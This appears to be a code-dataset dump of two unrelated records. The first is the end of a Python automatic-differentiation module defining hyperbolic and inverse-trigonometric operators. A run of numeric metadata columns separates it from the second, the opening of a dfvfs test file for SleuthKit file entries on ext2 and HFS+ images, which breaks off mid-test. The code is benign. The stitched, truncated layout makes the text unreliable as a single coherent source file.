        """Return sec(f) = 1/cos(f) evaluated under `val_dict`."""
        return 1/np.cos(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """First derivative of sec(f): f' tan(f) sec(f).

        Only order 1 is supported; higher orders raise NotImplementedError.
        """
        inner = sub_expr1.evaluation_at(val_dict)
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for sec.')
        return sub_expr1.derivative_at(var, val_dict) * \
               np.tan(inner) * (1/np.cos(inner))
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: tan(x)/cos(x) at the
        cached value."""
        cached = sub_expr1.val
        return np.tan(cached)/np.cos(cached)
def sec(expr):
    """Return an Expression applying the secant function to `expr`."""
    return Expression(Sec, expr)
class Csc:
    """Static helpers implementing the cosecant elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return csc(f) = 1/sin(f) evaluated under `val_dict`."""
        return 1/np.sin(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """First derivative of csc(f): -f' cot(f) csc(f).

        Only order 1 is supported; higher orders raise NotImplementedError.
        """
        inner = sub_expr1.evaluation_at(val_dict)
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for csc.')
        return -sub_expr1.derivative_at(var, val_dict) * \
               (1/np.tan(inner)) * (1/np.sin(inner))
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: -cot(x) csc(x) at the
        cached value."""
        cached = sub_expr1.val
        return -(1/np.tan(cached)) * (1/np.sin(cached))
def csc(expr):
    """Return an Expression applying the cosecant function to `expr`."""
    return Expression(Csc, expr)
class Sinh:
    """Static helpers implementing the hyperbolic sine elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return sinh(f) evaluated under `val_dict`."""
        return np.sinh(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """First derivative of sinh(f): f' cosh(f).

        Only order 1 is supported; higher orders raise NotImplementedError.
        """
        inner = sub_expr1.evaluation_at(val_dict)
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for sinh.')
        return sub_expr1.derivative_at(var, val_dict) * np.cosh(inner)
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: cosh at the cached value."""
        return np.cosh(sub_expr1.val)
def sinh(expr):
    """Return an Expression applying the hyperbolic sine to `expr`."""
    return Expression(Sinh, expr)
class Cosh:
    """Static helpers implementing the hyperbolic cosine elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return cosh(f) evaluated under `val_dict`."""
        return np.cosh(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """First derivative of cosh(f): f' sinh(f).

        Only order 1 is supported; higher orders raise NotImplementedError.
        """
        inner = sub_expr1.evaluation_at(val_dict)
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for cosh.')
        return sub_expr1.derivative_at(var, val_dict) * np.sinh(inner)
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: sinh at the cached value."""
        return np.sinh(sub_expr1.val)
def cosh(expr):
    """Return an Expression applying the hyperbolic cosine to `expr`."""
    return Expression(Cosh, expr)
class Tanh:
    """Static helpers implementing the hyperbolic tangent elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return tanh(f) = sinh(f)/cosh(f) evaluated under `val_dict`."""
        inner = sub_expr1.evaluation_at(val_dict)
        return np.sinh(inner)/np.cosh(inner)
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """First derivative of tanh(f): f' (1 - tanh(f)^2).

        Only order 1 is supported; higher orders raise NotImplementedError.
        """
        inner = sub_expr1.evaluation_at(val_dict)
        tanh = np.sinh(inner)/np.cosh(inner)
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for tanh.')
        return sub_expr1.derivative_at(var, val_dict) * (1-tanh*tanh)
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: 1 - tanh^2 at the cached
        value."""
        cached = sub_expr1.val
        tanh = np.sinh(cached)/np.cosh(cached)
        return 1-tanh*tanh
def tanh(expr):
    """Return an Expression applying the hyperbolic tangent to `expr`."""
    return Expression(Tanh, expr)
class Csch:
    """Static helpers implementing the hyperbolic cosecant elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return csch(f) = 1/sinh(f) evaluated under `val_dict`."""
        inner = sub_expr1.evaluation_at(val_dict)
        return 1/np.sinh(inner)
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """First derivative of csch(f): -f' csch(f) coth(f).

        Only order 1 is supported; higher orders raise NotImplementedError.
        """
        inner = sub_expr1.evaluation_at(val_dict)
        # local slope: -csch(x) * coth(x)
        slope = -(1/np.sinh(inner)) * (np.cosh(inner)/np.sinh(inner))
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for csch.')
        return sub_expr1.derivative_at(var, val_dict) * slope
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: -coth(x) csch(x) at the
        cached value."""
        cached = sub_expr1.val
        return -(np.cosh(cached)/np.sinh(cached))*(1/np.sinh(cached))
def csch(expr):
    """Return an Expression applying the hyperbolic cosecant to `expr`."""
    return Expression(Csch, expr)
class Sech:
    """Static helpers implementing the hyperbolic secant elementary function.

    Fix: evaluation_at and derivative_at were missing @staticmethod,
    unlike every sibling operator class (and this class's own
    backderivative_at). Calling through the class still worked in
    Python 3, but the decorators are added for consistency and to keep
    instance-based calls from mis-binding `self`.
    """
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """
        Compute sech of sub_expr1 with inputs of variable values from val_dict.
        INPUTS
        =======
        val_dict: a dictionary containing variable name and values.
        RETURNS
        ========
        sech sub_expr1
        """
        x = sub_expr1.evaluation_at(val_dict)
        return 1/np.cosh(x)
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """
        First derivative of sech(f): -f' sech(f) tanh(f).
        INPUTS
        =======
        sub_expr1: expression whose components include var (or var itself)
        val_dict: a dictionary containing variable name and values.
        var: variable of interest
        order: only 1 is supported; otherwise NotImplementedError
        RETURNS
        ========
        derivative of sech(sub_expr1) with respect to var
        """
        x = sub_expr1.evaluation_at(val_dict)
        # d = -sech(x)tanh(x)
        d = -(1/np.cosh(x)) * (np.sinh(x)/np.cosh(x))
        if order == 1:
            return sub_expr1.derivative_at(var, val_dict)*d
        else: raise NotImplementedError('higher order derivatives not implemented for sech.')
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """
        Local partial for back propagation: -sech(x) tanh(x) at the
        cached value sub_expr1.val.
        """
        x = sub_expr1.val
        return -(1/np.cosh(x)) * (np.sinh(x)/np.cosh(x))
def sech(expr):
    """Return an Expression applying the hyperbolic secant to `expr`."""
    return Expression(Sech, expr)
class Coth:
    """Static helpers implementing the hyperbolic cotangent elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """
        Compute coth of sub_expr1 with inputs of variable values from val_dict.
        INPUTS
        =======
        val_dict: a dictionary containing variable name and values.
        RETURNS
        ========
        coth sub_expr1
        """
        x = sub_expr1.evaluation_at(val_dict)
        return np.cosh(x)/np.sinh(x)
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """
        First derivative of coth(f): f' (1 - coth(f)^2).
        INPUTS
        =======
        sub_expr1: expression whose components include var (or var itself)
        val_dict: a dictionary containing variable name and values.
        var: variable of interest
        order: only 1 is supported; otherwise NotImplementedError
        RETURNS
        ========
        derivative of coth(sub_expr1) with respect to var
        """
        x = sub_expr1.evaluation_at(val_dict)
        coth = np.cosh(x)/np.sinh(x)
        if order == 1:
            return sub_expr1.derivative_at(var, val_dict) * (1-coth**2)
        # Fix: the error message previously said "cotan" in the coth class.
        else: raise NotImplementedError('higher order derivatives not implemented for coth.')
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """
        Local partial for back propagation: 1 - coth(x)^2 at the cached
        value sub_expr1.val.
        """
        x = sub_expr1.val
        coth = np.cosh(x)/np.sinh(x)
        return 1-coth**2
def coth(expr):
    """Build an Expression node applying the Coth (hyperbolic cotangent) op to expr."""
    node = Expression(Coth, expr)
    return node
class Arcsin:
    """
    Wrapper class bundling the static methods for the arcsin operation.
    """
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """
        Evaluate arcsin(sub_expr1) given the variable values in val_dict.

        INPUTS
        =======
        sub_expr1: expression to evaluate
        val_dict: a dictionary containing variable name and values.

        RETURNS
        ========
        arcsin of sub_expr1
        """
        inner_value = sub_expr1.evaluation_at(val_dict)
        return np.arcsin(inner_value)

    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """
        First derivative of the expression with respect to var (forward mode).

        INPUTS
        =======
        sub_expr1: expression whose components include var (or itself be var)
        var: variable of interest
        val_dict: a dictionary containing variable name and values.
        order: default to 1; higher orders are not implemented for arcsin.

        RETURNS
        ========
        derivative of sub_expr1 with respect to var

        RAISES
        ========
        NotImplementedError: if order != 1
        """
        inner_value = sub_expr1.evaluation_at(val_dict)
        # d/dx arcsin(x) = 1/sqrt(1 - x^2)
        local_grad = 1/np.sqrt(1-inner_value**2)
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for arcsin.')
        return sub_expr1.derivative_at(var, val_dict) * local_grad

    @staticmethod
    def backderivative_at(sub_expr1, var):
        """
        First derivative of the expression with respect to var (back propagation).

        INPUTS
        =======
        sub_expr1: expression whose components include var (or itself be var)
        var: variable of interest

        RETURNS
        ========
        derivative of sub_expr1 with respect to var, at sub_expr1.val
        """
        inner_value = sub_expr1.val
        return 1/np.sqrt(1-inner_value**2)
def arcsin(expr):
    """Build an Expression node applying the Arcsin (inverse sine) op to expr."""
    node = Expression(Arcsin, expr)
    return node
class Arccos:
    """
    Wrapper class bundling the static methods for the arccos operation.
    """
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """
        Evaluate arccos(sub_expr1) given the variable values in val_dict.

        INPUTS
        =======
        sub_expr1: expression to evaluate
        val_dict: a dictionary containing variable name and values.

        RETURNS
        ========
        arccos of sub_expr1
        """
        inner_value = sub_expr1.evaluation_at(val_dict)
        return np.arccos(inner_value)

    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """
        First derivative of the expression with respect to var (forward mode).

        INPUTS
        =======
        sub_expr1: expression whose components include var (or itself be var)
        var: variable of interest
        val_dict: a dictionary containing variable name and values.
        order: default to 1; higher orders are not implemented for arccos.

        RETURNS
        ========
        derivative of sub_expr1 with respect to var

        RAISES
        ========
        NotImplementedError: if order != 1
        """
        inner_value = sub_expr1.evaluation_at(val_dict)
        # d/dx arccos(x) = -1/sqrt(1 - x^2); the minus sign is applied below.
        local_grad = 1/np.sqrt(1-inner_value**2)
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for arccos.')
        return -sub_expr1.derivative_at(var, val_dict) * local_grad

    @staticmethod
    def backderivative_at(sub_expr1, var):
        """
        First derivative of the expression with respect to var (back propagation).

        INPUTS
        =======
        sub_expr1: expression whose components include var (or itself be var)
        var: variable of interest

        RETURNS
        ========
        derivative of sub_expr1 with respect to var, at sub_expr1.val
        """
        inner_value = sub_expr1.val
        return -1/np.sqrt(1-inner_value**2)
def arccos(expr):
    """Build an Expression node applying the Arccos (inverse cosine) op to expr."""
    node = Expression(Arccos, expr)
    return node
class Arctan:
    """
    Wrapper class bundling the static methods for the arctan operation.
    """
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """
        Evaluate arctan(sub_expr1) given the variable values in val_dict.

        INPUTS
        =======
        sub_expr1: expression to evaluate
        val_dict: a dictionary containing variable name and values.

        RETURNS
        ========
        arctan of sub_expr1
        """
        inner_value = sub_expr1.evaluation_at(val_dict)
        return np.arctan(inner_value)

    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """
        First derivative of the expression with respect to var (forward mode).

        INPUTS
        =======
        sub_expr1: expression whose components include var (or itself be var)
        var: variable of interest
        val_dict: a dictionary containing variable name and values.
        order: default to 1; higher orders are not implemented for arctan.

        RETURNS
        ========
        derivative of sub_expr1 with respect to var

        RAISES
        ========
        NotImplementedError: if order != 1
        """
        inner_value = sub_expr1.evaluation_at(val_dict)
        # d/dx arctan(x) = 1/(1 + x^2)
        local_grad = 1/(1+inner_value**2)
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for arctan.')
        return sub_expr1.derivative_at(var, val_dict) * local_grad

    @staticmethod
    def backderivative_at(sub_expr1, var):
        """
        First derivative of the expression with respect to var (back propagation).

        INPUTS
        =======
        sub_expr1: expression whose components include var (or itself be var)
        var: variable of interest

        RETURNS
        ========
        derivative of sub_expr1 with respect to var, at sub_expr1.val
        """
        inner_value = sub_expr1.val
        return 1/(1+inner_value**2)
def arctan(expr):
    """Build an Expression node applying the Arctan (inverse tangent) op to expr."""
    node = Expression(Arctan, expr)
    return node
def logit(expr):
    """Return the log-odds expression log(expr / (1 - expr))."""
    odds = expr/(1-expr)
    return log(odds)
def sigmoid(expr):
    """Return the logistic sigmoid expression 1 / (1 + exp(-expr))."""
    denominator = 1+exp(-expr)
    return 1/denominator
| 32.000537
| 105
| 0.578241
| 7,096
| 59,617
| 4.697858
| 0.032694
| 0.083753
| 0.027298
| 0.036477
| 0.887059
| 0.858651
| 0.835553
| 0.812185
| 0.785037
| 0.770278
| 0
| 0.021621
| 0.337454
| 59,617
| 1,863
| 106
| 32.000537
| 0.82235
| 0.398091
| 0
| 0.546042
| 0
| 0
| 0.037026
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.203554
| false
| 0
| 0.001616
| 0.037157
| 0.502423
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4a96de0ece39e2a0320359bc68df8ef91b9ecec
| 38,504
|
py
|
Python
|
tests/vfs/tsk_file_entry.py
|
dfrc-korea/dfvfs
|
7be70af72f56f4feadd50206e33b0f5024907473
|
[
"Apache-2.0"
] | 1
|
2021-02-15T03:41:46.000Z
|
2021-02-15T03:41:46.000Z
|
tests/vfs/tsk_file_entry.py
|
dfrc-korea/dfvfs
|
7be70af72f56f4feadd50206e33b0f5024907473
|
[
"Apache-2.0"
] | null | null | null |
tests/vfs/tsk_file_entry.py
|
dfrc-korea/dfvfs
|
7be70af72f56f4feadd50206e33b0f5024907473
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the file entry implementation using the SleuthKit (TSK)."""
import unittest
import pytsk3
from dfvfs.path import os_path_spec
from dfvfs.path import qcow_path_spec
from dfvfs.path import tsk_path_spec
from dfvfs.resolver import context
from dfvfs.vfs import tsk_file_entry
from dfvfs.vfs import tsk_file_system
from tests import test_lib as shared_test_lib
class TSKTimeTest(unittest.TestCase):
  """Tests for the SleuthKit timestamp."""

  def _GetTestFractionOfSecond(self):
    """Returns the fraction-of-second test value for the pytsk3 version."""
    # Newer SleuthKit versions report nanosecond precision.
    if pytsk3.TSK_VERSION_NUM >= 0x040200ff:
      return 546875000
    return 5468750

  def testCopyFromDateTimeString(self):
    """Tests the CopyFromDateTimeString function."""
    tsk_time_object = tsk_file_entry.TSKTime()

    tsk_time_object.CopyFromDateTimeString('2010-08-12 21:06:31.546875')
    self.assertEqual(tsk_time_object.timestamp, 1281647191)
    self.assertEqual(
        tsk_time_object.fraction_of_second, self._GetTestFractionOfSecond())

  def testCopyToStatTimeTuple(self):
    """Tests the CopyToStatTimeTuple function."""
    tsk_time_object = tsk_file_entry.TSKTime(
        fraction_of_second=self._GetTestFractionOfSecond(),
        timestamp=1281643591)

    stat_time_tuple = tsk_time_object.CopyToStatTimeTuple()
    self.assertEqual(stat_time_tuple, (1281643591, 5468750))

    # A timestamp-less object yields an empty tuple.
    tsk_time_object = tsk_file_entry.TSKTime()

    stat_time_tuple = tsk_time_object.CopyToStatTimeTuple()
    self.assertEqual(stat_time_tuple, (None, None))

  def testCopyToDateTimeString(self):
    """Tests the CopyToDateTimeString function."""
    tsk_time_object = tsk_file_entry.TSKTime(
        fraction_of_second=self._GetTestFractionOfSecond(),
        timestamp=1281643591)

    if pytsk3.TSK_VERSION_NUM >= 0x040200ff:
      expected_date_time_string = '2010-08-12 20:06:31.546875000'
    else:
      expected_date_time_string = '2010-08-12 20:06:31.5468750'

    date_time_string = tsk_time_object.CopyToDateTimeString()
    self.assertEqual(date_time_string, expected_date_time_string)

    tsk_time_object = tsk_file_entry.TSKTime()

    date_time_string = tsk_time_object.CopyToDateTimeString()
    self.assertIsNone(date_time_string)

  def testGetDate(self):
    """Tests the GetDate function."""
    tsk_time_object = tsk_file_entry.TSKTime(
        fraction_of_second=self._GetTestFractionOfSecond(),
        timestamp=1281643591)

    date_tuple = tsk_time_object.GetDate()
    self.assertEqual(date_tuple, (2010, 8, 12))

    tsk_time_object = tsk_file_entry.TSKTime()

    date_tuple = tsk_time_object.GetDate()
    self.assertEqual(date_tuple, (None, None, None))

  def testGetPlasoTimestamp(self):
    """Tests the GetPlasoTimestamp function."""
    tsk_time_object = tsk_file_entry.TSKTime(
        fraction_of_second=546875000, timestamp=1281643591)

    micro_posix_timestamp = tsk_time_object.GetPlasoTimestamp()
    self.assertEqual(micro_posix_timestamp, 1281643591546875)

    tsk_time_object = tsk_file_entry.TSKTime()

    micro_posix_timestamp = tsk_time_object.GetPlasoTimestamp()
    self.assertIsNone(micro_posix_timestamp)
# TODO: add tests for TSKAttribute
# TODO: add tests for TSKDataStream
class TSKDirectoryTest(shared_test_lib.BaseTestCase):
  """Tests the TSK directory."""

  def setUp(self):
    """Sets up the needed objects used throughout the test."""
    self._resolver_context = context.Context()
    test_path = self._GetTestFilePath(['ext2.raw'])
    self._SkipIfPathNotExists(test_path)

    self._os_path_spec = os_path_spec.OSPathSpec(location=test_path)
    self._tsk_path_spec = tsk_path_spec.TSKPathSpec(
        location='/', parent=self._os_path_spec)

    self._file_system = tsk_file_system.TSKFileSystem(self._resolver_context)
    self._file_system.Open(self._tsk_path_spec)

  def tearDown(self):
    """Cleans up the needed objects used throughout the test."""
    self._file_system.Close()
    self._resolver_context.Empty()

  def testInitialize(self):
    """Tests the __init__ function."""
    test_directory = tsk_file_entry.TSKDirectory(
        self._file_system, self._tsk_path_spec)

    self.assertIsNotNone(test_directory)

  def testEntriesGenerator(self):
    """Tests the _EntriesGenerator function."""
    test_directory = tsk_file_entry.TSKDirectory(
        self._file_system, self._tsk_path_spec)

    self.assertIsNotNone(test_directory)

    directory_entries = list(test_directory.entries)
    self.assertEqual(len(directory_entries), 5)
class TSKFileEntryTestExt2(shared_test_lib.BaseTestCase):
  """Tests the SleuthKit (TSK) file entry on ext2."""

  _INODE_A_DIRECTORY = 12
  _INODE_A_LINK = 16
  _INODE_ANOTHER_FILE = 15

  def setUp(self):
    """Sets up the needed objects used throughout the test."""
    self._resolver_context = context.Context()
    test_path = self._GetTestFilePath(['ext2.raw'])
    self._SkipIfPathNotExists(test_path)

    self._os_path_spec = os_path_spec.OSPathSpec(location=test_path)
    self._tsk_path_spec = tsk_path_spec.TSKPathSpec(
        location='/', parent=self._os_path_spec)

    self._file_system = tsk_file_system.TSKFileSystem(self._resolver_context)
    self._file_system.Open(self._tsk_path_spec)

  def tearDown(self):
    """Cleans up the needed objects used throughout the test."""
    self._file_system.Close()
    self._resolver_context.Empty()

  def _GetTestFileEntry(self, inode, location):
    """Retrieves the file entry for the given inode and location.

    The entry is asserted to exist before it is returned.
    """
    path_spec = tsk_path_spec.TSKPathSpec(
        inode=inode, location=location, parent=self._os_path_spec)
    file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
    self.assertIsNotNone(file_entry)
    return file_entry

  def testInitialize(self):
    """Tests the __init__ function."""
    file_entry = tsk_file_entry.TSKFileEntry(
        self._resolver_context, self._file_system, self._tsk_path_spec)

    self.assertIsNotNone(file_entry)

  # TODO: add tests for _GetAttributes
  # TODO: add tests for _GetDataStreams
  # TODO: add tests for _GetDirectory
  # TODO: add tests for _GetLink
  # TODO: add tests for _GetStat
  # TODO: add tests for _GetSubFileEntries
  # TODO: add tests for _GetTimeValue
  # TODO: add tests for _TSKFileTimeCopyToStatTimeTuple

  def testAccessTime(self):
    """Test the access_time property."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')
    self.assertIsNotNone(file_entry.access_time)

  def testBackupTime(self):
    """Test the backup_time property."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')
    self.assertIsNone(file_entry.backup_time)

  def testChangeTime(self):
    """Test the change_time property."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')
    self.assertIsNotNone(file_entry.change_time)

  def testCreationTime(self):
    """Test the creation_time property."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')
    self.assertIsNone(file_entry.creation_time)

  def testDeletionTime(self):
    """Test the deletion_time property."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')
    self.assertIsNone(file_entry.deletion_time)

  def testModificationTime(self):
    """Test the modification_time property."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')
    self.assertIsNotNone(file_entry.modification_time)

  def testName(self):
    """Test the name property."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')
    self.assertEqual(file_entry.name, 'another_file')

  def testSize(self):
    """Test the size property."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')
    self.assertEqual(file_entry.size, 22)

  def testGetFileEntryByPathSpec(self):
    """Tests the GetFileEntryByPathSpec function."""
    # Path specification with an inode only, no location.
    path_spec = tsk_path_spec.TSKPathSpec(
        inode=self._INODE_ANOTHER_FILE, parent=self._os_path_spec)
    file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)

    self.assertIsNotNone(file_entry)

  # TODO: add tests for GetFileObject

  def testGetLinkedFileEntry(self):
    """Tests the GetLinkedFileEntry function."""
    file_entry = self._GetTestFileEntry(self._INODE_A_LINK, '/a_link')

    linked_file_entry = file_entry.GetLinkedFileEntry()
    self.assertIsNotNone(linked_file_entry)
    self.assertEqual(linked_file_entry.name, 'another_file')

  def testGetParentFileEntry(self):
    """Tests the GetParentFileEntry function."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')

    parent_file_entry = file_entry.GetParentFileEntry()
    self.assertIsNotNone(parent_file_entry)
    self.assertEqual(parent_file_entry.name, 'a_directory')

  def testGetStat(self):
    """Tests the GetStat function."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')

    stat_object = file_entry.GetStat()
    self.assertIsNotNone(stat_object)

    self.assertEqual(stat_object.type, stat_object.TYPE_FILE)
    self.assertEqual(stat_object.size, 22)
    self.assertEqual(stat_object.mode, 436)
    self.assertEqual(stat_object.uid, 1000)
    self.assertEqual(stat_object.gid, 1000)

    self.assertEqual(stat_object.atime, 1567246979)
    self.assertFalse(hasattr(stat_object, 'atime_nano'))
    self.assertEqual(stat_object.ctime, 1567246979)
    self.assertFalse(hasattr(stat_object, 'ctime_nano'))
    # EXT2 has no crtime timestamp.
    self.assertFalse(hasattr(stat_object, 'crtime'))
    self.assertFalse(hasattr(stat_object, 'crtime_nano'))
    self.assertEqual(stat_object.mtime, 1567246979)
    self.assertFalse(hasattr(stat_object, 'mtime_nano'))

  # TODO: add tests for GetTSKFile

  def testIsFunctions(self):
    """Tests the Is? functions."""
    # A regular file.
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')

    self.assertFalse(file_entry.IsRoot())
    self.assertFalse(file_entry.IsVirtual())
    self.assertTrue(file_entry.IsAllocated())

    self.assertFalse(file_entry.IsDevice())
    self.assertFalse(file_entry.IsDirectory())
    self.assertTrue(file_entry.IsFile())
    self.assertFalse(file_entry.IsLink())
    self.assertFalse(file_entry.IsPipe())
    self.assertFalse(file_entry.IsSocket())

    # A directory.
    file_entry = self._GetTestFileEntry(
        self._INODE_A_DIRECTORY, '/a_directory')

    self.assertFalse(file_entry.IsRoot())
    self.assertFalse(file_entry.IsVirtual())
    self.assertTrue(file_entry.IsAllocated())

    self.assertFalse(file_entry.IsDevice())
    self.assertTrue(file_entry.IsDirectory())
    self.assertFalse(file_entry.IsFile())
    self.assertFalse(file_entry.IsLink())
    self.assertFalse(file_entry.IsPipe())
    self.assertFalse(file_entry.IsSocket())

    # The root directory.
    path_spec = tsk_path_spec.TSKPathSpec(
        location='/', parent=self._os_path_spec)
    file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
    self.assertIsNotNone(file_entry)

    self.assertTrue(file_entry.IsRoot())
    self.assertFalse(file_entry.IsVirtual())
    self.assertTrue(file_entry.IsAllocated())

    self.assertFalse(file_entry.IsDevice())
    self.assertTrue(file_entry.IsDirectory())
    self.assertFalse(file_entry.IsFile())
    self.assertFalse(file_entry.IsLink())
    self.assertFalse(file_entry.IsPipe())
    self.assertFalse(file_entry.IsSocket())

  def testSubFileEntries(self):
    """Tests the number_of_sub_file_entries and sub_file_entries properties."""
    path_spec = tsk_path_spec.TSKPathSpec(
        location='/', parent=self._os_path_spec)
    file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
    self.assertIsNotNone(file_entry)

    self.assertEqual(file_entry.number_of_sub_file_entries, 5)

    # Note that passwords.txt~ is currently ignored by dfvfs, since
    # its directory entry has no pytsk3.TSK_FS_META object.
    expected_sub_file_entry_names = [
        'a_directory',
        'a_link',
        'lost+found',
        'passwords.txt',
        '$OrphanFiles']

    sub_file_entry_names = [
        sub_file_entry.name for sub_file_entry in file_entry.sub_file_entries]

    self.assertEqual(
        len(sub_file_entry_names), len(expected_sub_file_entry_names))
    self.assertEqual(
        sorted(sub_file_entry_names), sorted(expected_sub_file_entry_names))

    # Test a path specification without a location.
    path_spec = tsk_path_spec.TSKPathSpec(
        inode=self._INODE_A_DIRECTORY, parent=self._os_path_spec)
    file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
    self.assertIsNotNone(file_entry)

    self.assertEqual(file_entry.number_of_sub_file_entries, 2)

  def testDataStreams(self):
    """Tests the data streams functionality."""
    # A regular file has a single, unnamed data stream.
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')

    self.assertEqual(file_entry.number_of_data_streams, 1)

    data_stream_names = [
        data_stream.name for data_stream in file_entry.data_streams]
    self.assertEqual(data_stream_names, [''])

    # A directory has no data streams.
    file_entry = self._GetTestFileEntry(
        self._INODE_A_DIRECTORY, '/a_directory')

    self.assertEqual(file_entry.number_of_data_streams, 0)

    data_stream_names = [
        data_stream.name for data_stream in file_entry.data_streams]
    self.assertEqual(data_stream_names, [])

  def testGetDataStream(self):
    """Tests the GetDataStream function."""
    file_entry = self._GetTestFileEntry(
        self._INODE_ANOTHER_FILE, '/a_directory/another_file')

    data_stream = file_entry.GetDataStream('')
    self.assertIsNotNone(data_stream)
class TSKFileEntryTestHFSPlus(shared_test_lib.BaseTestCase):
"""Tests the SleuthKit (TSK) file entry on HFS+."""
_INODE_A_DIRECTORY = 18
_INODE_A_LINK = 22
_INODE_ANOTHER_FILE = 21
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._resolver_context = context.Context()
test_file = self._GetTestFilePath(['hfsplus.raw'])
self._SkipIfPathNotExists(test_file)
self._os_path_spec = os_path_spec.OSPathSpec(location=test_file)
self._tsk_path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
self._file_system = tsk_file_system.TSKFileSystem(self._resolver_context)
self._file_system.Open(self._tsk_path_spec)
def tearDown(self):
"""Cleans up the needed objects used throughout the test."""
self._file_system.Close()
self._resolver_context.Empty()
def testInitialize(self):
"""Tests the __init__ function."""
file_entry = tsk_file_entry.TSKFileEntry(
self._resolver_context, self._file_system, self._tsk_path_spec)
self.assertIsNotNone(file_entry)
# TODO: add tests for _GetAttributes
# TODO: add tests for _GetDataStreams
# TODO: add tests for _GetDirectory
# TODO: add tests for _GetLink
# TODO: add tests for _GetStat
# TODO: add tests for _GetSubFileEntries
# TODO: add tests for _GetTimeValue
# TODO: add tests for _TSKFileTimeCopyToStatTimeTuple
def testAccessTime(self):
"""Test the access_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.access_time)
def testBackupTime(self):
"""Test the backup_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.backup_time)
def testChangeTime(self):
"""Test the change_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
